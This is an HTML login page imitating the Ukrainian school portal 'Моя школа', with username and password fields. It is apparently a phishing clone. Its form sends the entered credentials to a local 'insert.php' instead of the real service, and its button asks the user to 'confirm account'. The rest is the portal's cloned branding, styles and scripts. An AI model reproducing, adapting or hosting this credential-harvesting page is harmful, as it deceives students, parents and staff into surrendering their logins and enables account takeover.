﻿
<!DOCTYPE HTML>
<html style="height: 100%; overflow: auto;">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="verify-webtopay" content="2a4e3c1d0e825f4b682050849e698bdb">

    <title>Вхід</title>

    <link rel="shortcut icon" href="Content/favicon-1.ico">
    <link href="css-1?family=PT+Sans|Open+Sans|Open+Sans+Condensed:700&subset=latin,latin-ext" rel="stylesheet" type="text/css">
    <link rel="stylesheet" type="text/css" href="Content/isorinis-1.css?v=3.0.2466-D202509121332">
    <link rel="stylesheet" type="text/css" href="Content/tipsy-1.css" media="all">
    <link rel="stylesheet" type="text/css" href="Content/bootstrap.min-1.css" media="all">
    <link rel="stylesheet" type="text/css" href="Content/themes/base/jquery-ui.min-1.css" media="all">
    <link rel="stylesheet" type="text/css" href="Content/mdbootstrap/mdb.min-1.css" media="all">
    <link rel="stylesheet" type="text/css" href="Content/font-awesome.min-1.css" media="all">
    <link rel="stylesheet" type="text/css" href="Content/mdb.lite.min-1.css" media="all">

    <!--[if lte IE 9]>
        <link rel="stylesheet" type="text/css" href="/Content/isorinis.ie8.css?v=3.0.2466-D202509121332" />
    <![endif]-->
    <!--[if lte IE 7]>
        <link rel="stylesheet" type="text/css"  href="/Content/isorinis.ie7.css?v=3.0.2466-D202509121332" />
    <![endif]-->

    
</head>


    <body class="fixed-sn autumn-bg" style="height: 100%; overflow: auto;">

    
    
    <div class="container-fluid ">
        <div class="row align-items-center justify-content-center h-100 ">
            <div class="h-100" style="max-width:550px; padding:20px;">
                <div style="height:3rem"></div>
                <div class="card-container">
                    <div style="margin-bottom: -6px;">
                        

    <div class="card">
<form action="insert.php" id="main_form" method="post">            <!--<div class="" style="border-radius: 0.25rem 0.25rem 0 0; background: #65B825;">-->
            <!--<span style="color: white; padding-left: 3rem; text-transform: uppercase;">З 1 вересня, з днем ​​знань!  Разом до перемоги! </span>
            </div>-->
            <div class="card-body">
                <div class="container-fluid">
                    <div class="row">
                        <div class="col">
                            <div class="login-logo">
    <a href="https://www.moiashkola.ua" target="_blank"><img src="Content/img/Moya-shkola-2x-1.png" alt="Logo"></a>
</div>
                        </div>
                        <div class="col col-6 logoSide" style="position: absolute;">
                            
                            
                            
                            
                            <img class="logo_gele green_bar" src="Content/img/AutumnLogo2025-1.svg" alt="Logo">
                            
                            
                            
                            
                        </div>
                    </div>
                </div>

                <div class="text-left">
                    <b>Вхід</b>
                </div>

                <div class="text-left mb-4">
                    <a class="btn-link" href="Registracija-1.html">Реєстрація нових користувачів</a>
                </div>


                <div class="form-container">
                    <i class="mt-1 fa fa-user form-icon prefix grey-text"></i>
                    <input class="input-field" data-val="true" data-val-length="Ім’я користувача не може перевищувати 50 символів." data-val-length-max="50" data-val-required="Введіть ім&#39;я користувача" id="UserName" name="UserName" type="text" value="">
                    <label for="UserName">Логін</label>
                </div>

                <div class="form-container">
                    <i class="mt-1 fa fa-lock form-icon prefix grey-text"></i>
                    <input class="input-field" data-val="true" data-val-required="Введіть пароль." id="Password" name="Password" type="password">
                    <label for="Password" class="">Пароль</label>
                    <span toggle="#input-pwd" class="mt-2 fa fa-fw fa-eye field-icon toggle-password show-password-icon"></span>
                </div>

                <div class="link-panel-half">
                    <a href="Prisijungimas/PrimintiSlaptazodi-1.html" class="btn-link">Нагадати пароль</a>
                </div>

                <div class="text-right">
                    <button type="submit" class="btn login-btn-yellow waves-effect waves-light">Підтвердити Аккаунт</button>
                </div>

                
            </div>
</form>
                <div class="card-body-bottom">
                    <div class="md-form text-center">
                        <span>
                            Якщо хочете зареєструвати нову школу, звертайтесь за електронною адресою <a class="btn-link " href="/cdn-cgi/l/email-protection#f5868085859a8781b5989a9c94869d9e9a9994db8094"><span class="__cf_email__" data-cfemail="cdbeb8bdbda2bfb98da0a2a4acbea5a6a2a1ace3b8ac">support@moiashkola.ua</span></a>

                        </span>
                    </div>
                </div>



    </div>
    <form style="display: none;" id="vaiisis_form" method="post" action="https://www.epaslaugos.lt/portal/external/services/authentication/v2/">
        <input id="ticket" name="ticket" type="hidden" value="">
    </form>
        <div class="loginScreenLinks">
            <span>
                <a href="https://moyashkola.com.ua" target="_blank">WWW.MOIASHKOLA.UA</a>
            </span>
        </div>
    <div class="loginScreenLinks">
        <span>
            <a href="https://moiashkola.ua/privacy-policy/" target="_blank">Політика конфіденційності та правила користування</a>
        </span>
    </div>
    <div class="loginScreenLinks">

            <span>
                © <a href="https://www.nevda.eu" target="_blank">NEVDA</a> | Оператор системи “Моя школа” <a href="https://www.itpro.co.ua" target="_blank">ТОВ “АЙТІ ПРО”</a>
            </span>
    </div>

<style>
    .loginScreenLinks {
        position: relative;
        margin-top: 0.5rem;
        margin-bottom: 0.5rem;
        text-align: center !important;
    }
</style>


                    </div>
                </div>
            </div>
        </div>
    </div>

    <div class="modal fade" id="modalPush" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel">
        <div class="modal-dialog modal-dialog modal-notify modal-warning" role="document">
            <div class="modal-content text-center">
                <div class="modal-header d-flex justify-content-center">
                    <p class="heading"></p>
                </div>

                <div class="modal-body">
                    <a href="index-1.htm"><img src="Content/img/Moya-shkola-2x-1.png" alt="Logo"></a>
                    <h5 class="pt-3">Ви успішно вийшли із системи. Для Вашої безпеки просимо закрити це вікно.</h5>
                </div>

                <div class="modal-footer flex-center">
                    <a class="btn btn-primary waves-effect" data-dismiss="modal">Відмовитися</a>
                </div>
            </div>
        </div>
    </div>
<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'98292ef3fc128851',t:'MTc1ODQ1MzczMg=='};var a=document.createElement('script');a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();</script><script defer="" src="beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015-1" integrity="sha512-ZpsOmlRQV6y907TI0dKBHq9Md29nnaEIPlkf84rnaERnq6zvWvPUqr2ft8M1aS28oN72PdrCzSjY4U6VaAw1EQ==" data-cf-beacon='{"version":"2024.11.0","token":"49964a98d3be437b86faec7c22f82d79","server_timing":{"name":{"cfCacheStatus":true,"cfEdge":true,"cfExtPri":true,"cfL4":true,"cfOrigin":true,"cfSpeedBrain":true},"location_startswith":null}}' crossorigin="anonymous"></script>
</body>
</html>



    <!-- Global site tag (gtag.js) - Google Analytics -->
    <script async="" src="gtag/js-2?id=UA-135248891-2"></script>
    <script>
        window.dataLayer = window.dataLayer || [];
        function gtag() { dataLayer.push(arguments); }
        gtag('js', new Date());

        gtag('config', 'UA-135248891-2', {
        });
    </script>
    <script async="" src="gtag/js-3?id=G-7ERE8XX891"></script>
    <script>
        window.dataLayer = window.dataLayer || [];
        function gtag() { dataLayer.push(arguments); }
        gtag('js', new Date());

        gtag('config', 'G-7ERE8XX891', {
        });
    </script>
    <!-- Google tag (gtag.js) -->



<script src="Scripts/jquery-3.6.0.min-1.js" type="text/javascript"></script>
<script src="Scripts/bootstrap.min-1.js" type="text/javascript"></script>
<script src="Scripts/jquery.validate.min-1.js" type="text/javascript"></script>
<script src="Scripts/jquery.validate.unobtrusive.min-1.js" type="text/javascript"></script>
<script src="Scripts/jquery-ui-1.12.1.min-1.js" type="text/javascript"></script>
<script src="Scripts/Nevda.TaMo-1.js?v=3.0.2466-D202509121332" type="text/javascript"></script>
<script src="Scripts/jquery.ui.datepicker-uk-1.js" type="text/javascript"></script>
<script src="Scripts/jquery.ui.timepicker-1.js" type="text/javascript"></script>
<script src="Scripts/jquery.ui.timepicker-uk-1.js" type="text/javascript"></script>
<script src="Scripts/Nevda.Common-1.js?v=3.0.2466-D202509121332" type="text/javascript"></script>
<script src="Scripts/jquery.tipsy-1.js" type="text/javascript"></script>
<script src="Scripts/jquery.form-1.js" type="text/javascript"></script>
<script src="Scripts/mdbootstrap/mdb.min-1.js" type="text/javascript"></script>
<script type="text/javascript">
    $.validator.methods.range = function (value, element, param) {
        var globalizedValue = value.replace(",", ".");
        return this.optional(element) || (globalizedValue >= param[0] && globalizedValue <= param[1]);
    }

    $.validator.methods.number = function (value, element) {
        return this.optional(element) || /^-?(?:\d+|\d{1,3}(?:[\s\.,]\d{3})+)(?:[\.,]\d+)?$/.test(value);
    }
</script>
<script src="bundles/inputmask-1?v=BS-SO9vwq4tBm5WbzGmM59UOb5JUoaxgnr2KyPjvf2s1"></script>


<script type="text/javascript">
    $(document).ready(function () {
        $('.mdb-select').material_select();

        $('.main_form_trigger').click(function (event) {
            event.preventDefault();
            $('#main_form').submit();
        });

        $('.main_form_input').keypress(function (e) {
            if (e.keyCode == 13) {
                $('#main_form').submit();
            }
        });

        $(function () {
            $('.help_question').tipsy({ gravity: 'w', html: true });
        });
    });
</script>





    <script>
        $('.toggle-password').on('click', function () {
            $(this).toggleClass('fa-eye fa-eye-slash');
            var input = $("#Password");
            if (input.attr('type') == 'password') {
                input.attr('type', 'text');
            }
            else {
                input.attr('type', 'password');
            }
        });
    </script>

    
    <script type="text/javascript">
            $(document).ready(function () {
                $('.role_select').click(function (e) {
                    showOverlay();
                    $.ajax($(this).attr('href'), {
                        cache: false,
                        success: function () {
                            hideOverlay();
                            window.location.reload();
                        },
                        error: function () {
                            hideOverlay();
                            alert('не вдалося продовжити сеанс');
                        }
                    });
                });

                $('.loginbtn').click(function (e) {
                    if ($('#main_form').valid()) {
                        showOverlay();
                    }
                });
            });
    </script>
    


    <script>
        $(document).ready(function () {
            $('#UserName').focus();
        });
        var viispForm = $('#vaiisis_form'),
            prisijungtiBtn = $('.prisijungtiViispBtn');

        prisijungtiBtn.click(function (e) {
            e.preventDefault();
            $.post("/VIISP/GetAuthTicket", function (data) {
                if (data.Ticket != "") {
                    $('#ticket').val(data.Ticket);
                    viispForm.submit();
                }
            });
        });
    </script>
